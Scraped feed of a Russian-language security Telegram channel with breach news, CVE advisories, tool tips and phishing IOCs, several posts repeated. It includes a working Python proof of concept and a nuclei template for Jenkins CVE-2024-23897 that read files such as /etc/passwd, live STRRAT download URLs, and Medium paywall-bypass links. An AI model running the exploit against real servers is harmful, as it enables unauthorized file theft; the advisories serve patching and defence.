Forwarded from Утечки информации
15,115,516 профилей пользователей облачного сервиса для управления командами и проектами Trello.com (принадлежит «Atlassian») были выставлены на продажу на одном из теневых форумов. 🔥🔥
Данные содержат:
🌵 имя/фамилия
🌵 адрес эл. почты
🌵 имя пользователя
🌵 ссылку на профиль
Сервис заявляет, что всего у них более 50 млн пользователей.
Данные содержат:
🌵 имя/фамилия
🌵 адрес эл. почты
🌵 имя пользователя
🌵 ссылку на профиль
Сервис заявляет, что всего у них более 50 млн пользователей.
Forwarded from Ralf Hacker Channel (Ralf Hacker)
От имени любого пользователя можно аварийно завершить службу журнала событий Windows.
https://github.com/floesen/EventLogCrasher
#redteam #bypass #maldev
https://github.com/floesen/EventLogCrasher
#redteam #bypass #maldev
GitHub
GitHub - floesen/EventLogCrasher
Contribute to floesen/EventLogCrasher development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
Top 8 types of Cyber Attacks...
Удобная тулзина #cvemap от создателей nuclei и не только, разработанная для обеспечения структурированной и удобной работы с различными базам данных уязвимостей...
Link: https://github.com/projectdiscovery/cvemap?ref=blog.projectdiscovery.io
#tools
Link: https://github.com/projectdiscovery/cvemap?ref=blog.projectdiscovery.io
#tools
Mama mia Санта Лючия
Говорят якобы продают доступ админский к THM (TryHackMe)
https://x.com/h4x0r_dz/status/1749898836485497004?s=20
Но вроде в комментах владельцы сервиса не смотгли добыть доказательств...
Говорят якобы продают доступ админский к THM (TryHackMe)
https://x.com/h4x0r_dz/status/1749898836485497004?s=20
Но вроде в комментах владельцы сервиса не смотгли добыть доказательств...
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Sergey Zybnev)
SecuriXy.kz
Jenkins RCE Arbitrary File Read CVE-2024-23897 Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних…
Jenkins nuclei-template
RCE Arbitrary File Read CVE-2024-23897
Пока официально не добавили в nuclei-template. Я не проверял ещё.Не на чем 😢
🌚 @poxek
RCE Arbitrary File Read CVE-2024-23897
Пока официально не добавили в nuclei-template. Я не проверял ещё.
id: CVE-2024-23897
info:
name: Jenkins < 2.441 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
tags: cve,cve2024,lfi,rce,jenkins
variables:
payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"
javascript:
- code: |
let m = require('nuclei/net');
let name=(Host.includes(':') ? Host : Host+":80");
let conn,conn2;
try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}
conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}
conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
resp = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Hostname}}"
matchers:
- type: dsl
dsl:
- 'contains(response, "No such agent \"")'
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from OpenBLD.net (Yevgeniy Goncharov)
Today I blocked new SCAM company targeted to Kazakhstan.
All malicious domains sended to OpenBLD.net.
Be careful - before clink on he link, view attentively before clink ))
All malicious domains sended to OpenBLD.net.
Be careful - before clink on he link, view attentively before clink ))
Парой когда не хочется заморачиваться с установкой и настройкой zshrc, но нужны красивости шела
#Fish shell - очень удобная, умная, интерактивная оболочка командной строки для Linux и MacOS с подсветкой синтаксиса и автодополнением набираемых команд.
https://fishshell.com
#Tools #Bash
#Fish shell - очень удобная, умная, интерактивная оболочка командной строки для Linux и MacOS с подсветкой синтаксиса и автодополнением набираемых команд.
sudo apt-get install fish
chsh -s /usr/bin/fish
fish
https://fishshell.com
#Tools #Bash
Если подключаете источник событий к UTM/SIEM и нужно быстро чекнуть доступность порта дабы не ждать пока придут события и потом не дебажить долго, юзайте комманду, заменив IP на свой хост.
#siem #514
echo -n "<14>mytesthost This is a syslog ***TCP 514*** Test" | nc -w5 -v 192.168.1.1 514
#siem #514
Forwarded from AM Live (oleg IV)
Сегодня вечером ряд пользователей ру-сегмента Сети начал сообщать о недоступности веб-сайтов. Отмечались проблемы с DNS-резолвингом доменов в российской зоне, некоторые пишут, что сломался DNSSEC.
Anti-Malware
Домены в зоне .RU недоступны, сообщается о проблемах с DNSSEC
Сегодня вечером ряд пользователей ру-сегмента Сети начал сообщать о недоступности веб-сайтов. Отмечались проблемы с DNS-резолвингом доменов в российской зоне, некоторые пишут, что сломался DNSSEC.О
Apache Tomcat HTTP Request Smuggling (Client-Side Desync)
Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733
https://hackerone.com/reports/2327341
Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43
Patched: 8.5.64 and 9.0.44
#CVE #Tomcat
Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733
https://hackerone.com/reports/2327341
Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43
Patched: 8.5.64 and 9.0.44
#CVE #Tomcat
Для не любителей обновлять OS Linux печальная новость...
Новая #LPE уязвимость #CVE-2023-6246 в библиотеке GNU C (glibc) в функции __vsyslog_internal обнаружено переполнение буфера, основанное на куче. Эта функция вызывается функциями syslog и vsyslog. Проблема возникает, если функция openlog не была вызвана или была вызвана с аргументом ident, установленным в NULL, а имя программы (basename из argv[0]) больше 1024 байт, что приводит к аварийному завершению работы приложения или локальному повышению привилегий.
Published: 2024-01-31
Base Score: 8.4
Base Severity: HIGH
Vulnerable: glibc 2.36 >
Debian 12 и 13, Ubuntu 23.04 и 23.10, Fedora 37 до 39 были уязвимы для эксплуатации на дефолтных настройках.
Если у Вас в конторе Qualys, чекнуть хосты можно
```
vulnerabilities.vulnerability.cveIds:CVE-2023-6246
```
https://blog.qualys.com/vulnerabilities-threat-research/2024/01/30/qualys-tru-discovers-important-vulnerabilities-in-gnu-c-librarys-syslog
Новая #LPE уязвимость #CVE-2023-6246 в библиотеке GNU C (glibc) в функции __vsyslog_internal обнаружено переполнение буфера, основанное на куче. Эта функция вызывается функциями syslog и vsyslog. Проблема возникает, если функция openlog не была вызвана или была вызвана с аргументом ident, установленным в NULL, а имя программы (basename из argv[0]) больше 1024 байт, что приводит к аварийному завершению работы приложения или локальному повышению привилегий.
Published: 2024-01-31
Base Score: 8.4
Base Severity: HIGH
Vulnerable: glibc 2.36 >
Debian 12 и 13, Ubuntu 23.04 и 23.10, Fedora 37 до 39 были уязвимы для эксплуатации на дефолтных настройках.
Если у Вас в конторе Qualys, чекнуть хосты можно
```
vulnerabilities.vulnerability.cveIds:CVE-2023-6246
```
https://blog.qualys.com/vulnerabilities-threat-research/2024/01/30/qualys-tru-discovers-important-vulnerabilities-in-gnu-c-librarys-syslog
Очередная атака на казнет, фишинговая рассылка нацеленная на бухгалтеров компаний (Юр/Физ лиц)
Мы получили 2 сэмпла таких рассылок. В каждом из них разные ссылки:
Но целевая ссылка у них одна:
Это PDF документ со ссылкой на SalykFormJava - STRRAT Java-based RAT
В песочнице Any.RUN - есть отдельная страница по IOC данного ратника
На момент рассылки данный ратник не детектился большинством АВПО 1 2 - сейчас 21 и 26 детект из 61 для двух полученных сэмплов.
Так же стоит отметить, что сама фишинговая компания сделана очень продуманно, на нее могут купиться люди, будьте бдительны...
IOC:
#strrat #phishing
Мы получили 2 сэмпла таких рассылок. В каждом из них разные ссылки:
hXXps://oneindia[.]info/wjzq
hXXps://jretail[.]co[.]uk/xt9v
Но целевая ссылка у них одна:
hXXps://egov-kz[.]online/132843268324/7234632478/egovnotifications/uvedomleniya/8723747899/January/2024-1/bughalteram-po-nalogam/notice/SalykFormJavaDocument.pdf
Это PDF документ со ссылкой на SalykFormJava - STRRAT Java-based RAT
В песочнице Any.RUN - есть отдельная страница по IOC данного ратника
На момент рассылки данный ратник не детектился большинством АВПО 1 2 - сейчас 21 и 26 детект из 61 для двух полученных сэмплов.
Так же стоит отметить, что сама фишинговая компания сделана очень продуманно, на нее могут купиться люди, будьте бдительны...
IOC:
dualstack.sonatype.map.fastly.net
199.232.192.209
https://egov-kz.online/132843268324/7234632478/egovnotifications/uvedomleniya/8723747899/January/2024-1/bughalteram-po-nalogam/notice/SalykFormJavaRU.jar
https://egov-kz.online/132843268324/7234632478/egovnotifications/uvedomleniya/8723747899/January/2024-1/bughalteram-po-nalogam/notice/SalykFormJavaKZ.jar
https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5-jar
MD5: 14c6e272eb3038aa41a57f5c81fd9fb3
4a3d3f1ffcd92d8cbcc1a608901d3d2e
SHA256: ee113a592431014f44547b144934a470a1f7ab4abec70ba1052a4feb3d15d5c6 25C622E702B68FD561DB1AEC392AC01742E757724DD5276B348C11B6C5E23E59
#strrat #phishing
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium #premium #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
AnyDesk - compromised any keys:
"После появления признаков инцидента в некоторых наших системах мы провели аудит безопасности и обнаружили признаки взлома производственных систем. Мы немедленно активировали план по устранению последствий и реагированию с привлечением экспертов по кибербезопасности CrowdStrike.
Мы отозвали все сертификаты, связанные с безопасностью, а системы были восстановлены или заменены, где это необходимо. В ближайшее время мы отменим предыдущий сертификат подписи кода для наших двоичных файлов и уже начали заменять его на новый."
https://anydesk.com/en/public-statement
"После появления признаков инцидента в некоторых наших системах мы провели аудит безопасности и обнаружили признаки взлома производственных систем. Мы немедленно активировали план по устранению последствий и реагированию с привлечением экспертов по кибербезопасности CrowdStrike.
Мы отозвали все сертификаты, связанные с безопасностью, а системы были восстановлены или заменены, где это необходимо. В ближайшее время мы отменим предыдущий сертификат подписи кода для наших двоичных файлов и уже начали заменять его на новый."
https://anydesk.com/en/public-statement